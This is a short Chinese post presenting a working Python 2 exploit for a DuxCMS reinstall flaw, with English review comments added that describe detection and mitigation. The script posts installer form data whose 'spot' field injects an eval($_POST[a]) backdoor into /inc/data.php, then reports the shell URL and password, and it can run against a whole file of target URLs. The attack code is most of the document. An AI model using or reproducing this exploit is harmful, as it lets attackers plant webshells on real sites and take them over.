针对的是不久发的
duxcms 重装漏洞并 getshell（这个可以无视 GPC）
直接发 EXP。之前想写的，写了一半就没写了，后来胎哥又写出来了，思路一样：直接提交 POST 数据。代码如下：
# Review notes (defensive reading of this script):
#   * Trigger: a POST to /install/install.php on a site where the installer is
#     still reachable re-runs installation with request-supplied DB settings.
#   * Persistence: the "spot" field carries a quote-break plus PHP; the
#     installer appears to write it into /inc/data.php unescaped (inferred
#     from the marker check below -- verify against the CMS source).
#   * Detection: a POST to /install/install.php after go-live followed by a
#     GET of /inc/data.php; /inc/data.php containing anything beyond plain
#     config assignments; the literal marker "test666123x" in that file.
#   * Mitigation: remove or lock the /install/ directory after deployment and
#     put /inc/data.php under file-integrity monitoring. (Presumably the CMS
#     ships an install lock; confirm for the affected version.)
# The code is Python 2 (print statements) and is reproduced as published; the
# only change in this listing is restored line breaks plus these comments.
import requests
from sys import argv


def getshell():
    """Post the installer form, then look for the marker in /inc/data.php.

    Arguments are read positionally from sys.argv as laid out in the usage
    text under __main__: argv[2] = DB host, argv[4] = DB port, argv[6] = DB
    user, argv[8] = DB password; argv[9] selects single-URL ('-u') or
    URL-file ('-f') mode and argv[10] is the URL or the file path. The flag
    letters at positions 1/3/5/7 are never checked, so '-u' at argv[5] and
    '-u' at argv[9] do not collide. Nothing is returned; results are printed.
    """
    ip = argv[2]
    port = argv[4]
    user = argv[6]
    passwd = argv[8]
    # Installer form fields. "spot" is the injected value: it closes the
    # quoted string the installer emits, appends PHP, and ends with '#' so the
    # rest of the generated line is commented out. "test666123x" is the marker
    # searched for below. The meaning of "KEY" is not visible here.
    data = {"DB_HOST":ip,"DB_PORT":port,"DB_NAME":"duxcms","create":"1","DB_USER":user,"DB_PWD":passwd,"DB_PREFIX":"dc_","spot":"2PL4T_';phpinfo();eval($_POST[a]);echo 'test666123x';#","KEY":"AHT0CALHM0_"}
    if argv[9]=='-u':
        # Single-target mode. The POST response is never inspected (r is
        # unused); success is judged solely by the marker in /inc/data.php.
        try:
            r = requests.post(argv[10]+'/install/install.php',data=data,timeout=5)
            y = requests.get(argv[10]+'/inc/data.php',timeout=5)
            if ('test666' in y.text):
                print 'shell: ' + y.url + ' pass:a'
            else:
                print "does not exist"
        except:
            # Bare except: connection errors, timeouts and KeyboardInterrupt
            # are all reported as "does not exist".
            print "does not exist"
    elif argv[9]=='-f':
        # Batch mode: one URL per line in the file at argv[10]. The file is
        # never closed, and a trailing newline produces an empty URL entry.
        for i in open(argv[10]).read().split('\n'):
            #print i
            try:
                r = requests.post(i+'/install/install.php',data=data,timeout=5)
                y = requests.get(i+'/inc/data.php',timeout=5)
                if ('test666' in y.text):
                    print 'shell: ' + y.url + ' pass:a'
                else:
                    print "does not exist"
            except:
                # Errors are silently skipped in batch mode.
                pass


if __name__=="__main__":
    # Usage text is kept verbatim (its original line breaks were lost when the
    # listing was collapsed, so the literal is left as published).
    if len(argv)<10:
        print ''' test.py -p 127.0.0.1 -o 3306 -u root -m root -f 1.txt test.py -p 127.0.0.1 -o 3306 -u root -m root -u http://127.0.0.1/test/'''
    else :
        getshell()
Git 源：
https://github.com/0xTback/duxcmsexp